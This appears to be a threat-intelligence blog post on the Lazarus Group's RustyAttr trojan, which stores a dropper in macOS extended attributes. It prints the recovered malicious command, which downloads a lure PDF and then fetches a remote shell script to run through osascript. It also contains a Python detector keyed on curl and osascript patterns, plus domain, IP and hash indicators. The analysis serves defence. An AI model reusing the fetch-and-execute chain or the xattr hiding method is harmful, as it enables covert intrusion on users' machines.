Hidden World of xattr: Lazarus Group’s Abuse of "Rustyattr" to Evade Detection
Lazarus Group hides malware in macOS extended attributes (xattr), evading detection.
A technique, often overlooked, involves the use of extended file attributes, specifically the xattr command found in Unix-like operating systems such as macOS and Linux. Much like Windows Alternate Data Streams (ADS), which allow attackers to hide data in the NTFS filesystem, xattr provides a mechanism for embedding metadata alongside files without altering their visible content.
This stealthy use of xattr (which we’ll refer to as RustyAttr) has been increasingly leveraged by threat groups, including the Lazarus Group, making it a critical but often overlooked vector in modern cyberattacks. In this post, we’ll look at how the Lazarus Group, in particular, is using xattr (or RustyAttr) to secretly stash malicious data in system files, making it harder to detect with traditional methods.
This technique is not yet officially recognized in the MITRE ATT&CK Framework, meaning defenders may be unprepared for this subtle, persistent form of attack.
What is xattr?
xattr is short for extended attributes, a feature available on Unix-based systems like macOS, Linux, and BSD. It allows you to attach additional metadata to files, data that is separate from the file’s standard attributes, such as size or modification time. This metadata can be anything from custom tags and system-specific information (like quarantine flags) to binary data, making it an incredibly versatile tool for managing files and their related data.
On macOS, for example, xattr is often used to store data like Finder tags, file quarantine information, and Spotlight search metadata. While these attributes are usually harmless and help improve the system’s functionality, they can be exploited by attackers to hide malicious data in plain sight.
Creating a file and adding hidden data via xattr
We start off by creating a simple text file:
# Create a file called secret.txt
touch secret.txt
# Add some text to the file
echo "not so secret" >> secret.txt
# Display the content of the text file
cat secret.txt
Now, let's use xattr to store hidden data in the file’s extended attributes. Here, we name the attribute com.example.hidden_data and assign it some value:
xattr -w com.example.hidden_data "This is secret information" secret.txt
Listing the attributes
To see the names of the extended attributes attached to the file, we can run:
xattr secret.txt
Viewing the Hidden Data
To view the hidden data stored in the extended attribute, use the following command:
xattr -l secret.txt
Deleting the Hidden Data
Finally, to remove the attribute, we can run:
xattr -d com.example.hidden_data secret.txt
Lazarus Group's Abuse of Extended Attributes
A recent analysis by Group-IB shed light on the Lazarus Group’s use of extended attributes (xattr) to maintain persistence on macOS systems. This form of code concealment leverages macOS's ability to store metadata alongside files, allowing attackers to hide malicious code in a way that avoids detection by traditional security tools.
The RustyAttr Trojan
According to Group-IB’s findings, the Lazarus Group has developed a trojan named RustyAttr. The name is a nod to the Rust programming language and its integration within the Tauri framework for building cross-platform desktop applications. The RustyAttr trojan takes advantage of macOS extended attributes as a covert persistence mechanism. By embedding malicious code within these attributes, the trojan can remain hidden from file system monitoring tools and antivirus software.
This stealthy technique enables the Lazarus Group to persist on compromised systems without triggering alarms from traditional detection systems like VirusTotal, which focus primarily on scanning visible files and executables.
File Discovery and Analysis
We found an example of the RustyAttr payload on VirusTotal. The sample in question was a zip file named DD Form Questionnaire.zip with the SHA-256 hash 878e3701df9b0abdaa7094e22d067c8398a9fc842cabe917fd5f75f2c84d8552, which we downloaded onto a macOS machine for further analysis.
After extracting the zip file, we see two files: a .docx file and an application bundle (.app).
To explore the extended attributes in the .app bundle, we first use the following command with the -r flag. The -r (recursive) flag tells the xattr command to recursively search through all files and sub-directories inside the specified directory.
xattr -r 'Investment Decision-Making Questionnaire.app'
After running the xattr -r command, we see a list of attribute names attached to the files in the app package, such as com.apple.quarantine, com.apple.FinderInfo, and many more.
- com.apple.quarantine: This is a system attribute automatically added by macOS to files downloaded from the internet. It helps the system recognize files that may need to be checked for safety before opening (e.g., by triggering the Gatekeeper or XProtect security features).
- com.apple.FinderInfo: Another macOS-specific attribute, typically used by the Finder app to store additional metadata related to file display properties (like icon placement or window size).
The most important one, and the one which sticks out, is called test.
Next, we want to look at the actual data stored within the custom test attribute. To do this, we use the -p flag. The -p flag is used to print the contents of a specific extended attribute. In this case, we're telling xattr to show the data stored in the test attribute associated with the AwesomeTemplate executable inside the .app package.
xattr -p test 'Investment Decision-Making Questionnaire.app/Contents/MacOS/AwesomeTemplate'
This is where we uncover the malicious shell command that the Lazarus Group has embedded in the file.
(curl -o "/Users/Shared/Investment Decision-Making Questionnaire.pdf" "https://filedn.com/lY24cv0IfefboNEIN0I9gqR/dragonfly/Investment%20Decision-Making%20Questionnaire_Epic.pdf" || true) && (open "/Users/Shared/Investment Decision-Making Questionnaire.pdf" || true) && (shell=$(curl -L -k "hxxps[://]support[.]cloudstore[.]business/938689/check"); osascript -e "do shell script $shell")
The command downloads a PDF file to a specific location, /Users/Shared/. This directory is a special folder on macOS intended for sharing files between multiple users on the same machine. Files stored here are accessible by all users (with appropriate permissions). If the system has multiple accounts, placing files here ensures that they can be accessed easily by different users on the same machine.
It then opens that PDF file in the default viewer. Finally, it fetches a shell script from a URL and executes it via AppleScript. The || true parts ensure that any failures in the individual commands (like network issues or the file not opening) won't stop the entire sequence from running.
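The manual xattr -r / xattr -p walk above is exactly what a defender wants to automate. The script below is an added example, not code from the original post or from Group-IB: it recurses a directory tree, reads every extended attribute, and reports attribute names outside the com.apple.* namespace as well as values containing the indicators seen in the recovered command (curl, open, osascript, "do shell script", a URL). The classification logic is a pure function, so it is exercised here on a constructed attribute set that mirrors the AwesomeTemplate finding (placeholder URLs, not the real infrastructure); on Linux the attributes are read with os.listxattr, and the fallback to the macOS xattr tool via subprocess is this example's assumption.

```python
"""Added example (not from the original post or Group-IB's research):
walk a directory tree, read each path's extended attributes, and flag
the ones a defender should review: names outside com.apple.* and values
that look like the dropper command recovered from the "test" attribute.
"""
import os
import re
import subprocess

# Namespaces macOS itself writes (quarantine, FinderInfo, Spotlight, ...).
KNOWN_PREFIXES = ("com.apple.",)

# Content indicators taken from the recovered command: a download, a launch,
# and AppleScript-driven shell execution.
SUSPICIOUS_TOKENS = [
    ("curl", re.compile(rb"\bcurl\b")),
    ("osascript", re.compile(rb"\bosascript\b")),
    ("do shell script", re.compile(rb"do shell script")),
    ("url", re.compile(rb"https?://")),
    ("open", re.compile(rb"\bopen\b")),
]


def classify_attrs(path, attrs):
    """Return [(path, attr_name, [reasons])] for attributes worth a look.

    attrs maps attribute name -> raw value (bytes). Pure function, so it can
    be exercised with constructed input on any platform.
    """
    findings = []
    for name, value in attrs.items():
        reasons = []
        if not name.startswith(KNOWN_PREFIXES):
            reasons.append("non-Apple attribute name")
        hits = [label for label, rx in SUSPICIOUS_TOKENS if rx.search(value)]
        if hits:
            reasons.append("value contains " + ", ".join(hits))
        if reasons:
            findings.append((path, name, reasons))
    return findings


def read_attrs(path):
    """Collect name -> value for one path.

    Uses os.listxattr/os.getxattr where Python provides them (Linux). On
    macOS those functions are absent, so this falls back to the xattr tool
    from the post: `xattr FILE` lists names, `xattr -p NAME FILE` prints a
    value (binary values arrive as the tool's hex dump, which is enough for
    text-token matching). The subprocess fallback is this example's
    assumption, not something the post describes.
    """
    attrs = {}
    if hasattr(os, "listxattr"):
        try:
            for name in os.listxattr(path, follow_symlinks=False):
                attrs[name] = os.getxattr(path, name, follow_symlinks=False)
        except OSError:
            pass
        return attrs
    try:
        names = subprocess.run(["xattr", path], capture_output=True, check=True).stdout.split()
        for raw in names:
            name = raw.decode()
            attrs[name] = subprocess.run(["xattr", "-p", name, path],
                                         capture_output=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        pass
    return attrs


def scan_tree(root):
    """Recursive equivalent of `xattr -r ROOT`, filtered to reviewable findings."""
    findings = classify_attrs(root, read_attrs(root))
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            full = os.path.join(dirpath, entry)
            findings.extend(classify_attrs(full, read_attrs(full)))
    return findings


# Constructed sample modelled on the post's findings: two benign Apple
# attributes plus the custom "test" attribute carrying a dropper. The URLs
# are placeholders, not the real infrastructure.
SAMPLE_ATTRS = {
    "com.apple.quarantine": b"0083;00000000;Safari;00000000-0000-0000-0000-000000000000",
    "com.apple.FinderInfo": bytes(32),
    "test": (
        b'(curl -o "/Users/Shared/lure.pdf" "https://example.invalid/lure.pdf" || true) && '
        b'(open "/Users/Shared/lure.pdf" || true) && '
        b'(shell=$(curl -L -k "https://example.invalid/check"); osascript -e "do shell script $shell")'
    ),
}

if __name__ == "__main__":
    import sys
    # With a path argument, scan a real tree; otherwise run on the sample.
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_tree(target) if target else classify_attrs("AwesomeTemplate", SAMPLE_ATTRS)
    for path, name, reasons in results:
        print(f"{path}: {name}: {'; '.join(reasons)}")
```

Run it as `python3 scan_xattr.py 'Investment Decision-Making Questionnaire.app'` to triage a bundle; run it with no argument to see the sample classified. The name allowlist is deliberately narrow: on a real fleet you would extend KNOWN_PREFIXES with the attributes your own software legitimately writes and treat anything left over as a review item rather than an automatic verdict.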
Since the URL for the shell script was non-functional during our analysis, the second stage of the payload remains unknown.
hxxps[://]support[.]cloudstore[.]business/938689/check
Domain reputation
To further investigate the source of the malicious payload, we checked the reputation of the domain used in the malicious curl commands. Using a tool like Validin, we confirmed that the domain associated with the URL is flagged as malicious.
Reviewing the domain's information, we observed that it is linked to an IP address which is categorized as a CERT_DOMAIN-IP. This type of categorization indicates that the IP address is associated with known threat actor infrastructure, commonly flagged by Computer Emergency Response Teams (CERTs). This connection reinforces the likelihood that the Lazarus Group (or a related actor) is behind the attack, as they are known to use such infrastructure for their campaigns.
By pivoting on the IP address, we can identify other malicious domains hosted on the same infrastructure.
Key observations from Group-IB’s research include:
- The RustyAttr trojan is able to fetch and execute malicious scripts directly from extended attributes, bypassing the file system’s conventional monitoring tools.
- The trojan was initially signed with a leaked certificate, though it was later revoked, and the file’s unnotarized status made it harder to detect via macOS Gatekeeper.
- The Lazarus Group used social engineering to lure victims into running the trojan, often disguised as decoy applications that appeared to be legitimate PDFs or system utilities.
Conclusion
xattr, like Windows Alternate Data Streams, is a powerful, often-overlooked tool that can be abused for malicious purposes, providing attackers like the Lazarus Group with a stealthy persistence mechanism. By hiding critical data and payloads in file metadata, RustyAttr can evade detection by traditional security solutions, allowing attackers to maintain control of compromised systems for extended periods. With this technique not yet documented in the MITRE ATT&CK Framework, it remains a significant and largely unaddressed threat. To stay ahead of these emerging threats, defenders must be proactive in monitoring and securing extended file attributes, ensuring that even the most subtle attack techniques are recognized and mitigated.
For a deeper dive into the RustyAttr malware and how the Lazarus Group is leveraging this technique, check out the original research from Group-IB.
IOC
com.tauri.awesome
e87177e07ab9651b48664c3d22334248e012e8a2bab02f65c93fedd79af0a74f7464850d7d6891418c503d0e1732812d7703d6c1fd5cf3c821f3c202786f9422
022344029b8bf951ba02b11025fe26c99193cb7c8a482c33862c9bbaa5e5528e
48ee5d0d44a015876d867fa515b04c1998fecf19badcbd69f4f3fa8497d57215
DD Form Questionnaire.zip
878e3701df9b0abdaa7094e22d067c8398a9fc842cabe917fd5f75f2c84d8552
DD_Form & Discussion Points.zip
4bce97eff4430708299a1bb4142b9d359d8adf77a2e1673bf76485df25e6d357
====================================================
cloudstore[.]business
docsend[.]site
=====================================================
104[.]168[.]165[.]203
104[.]168[.]157[.]45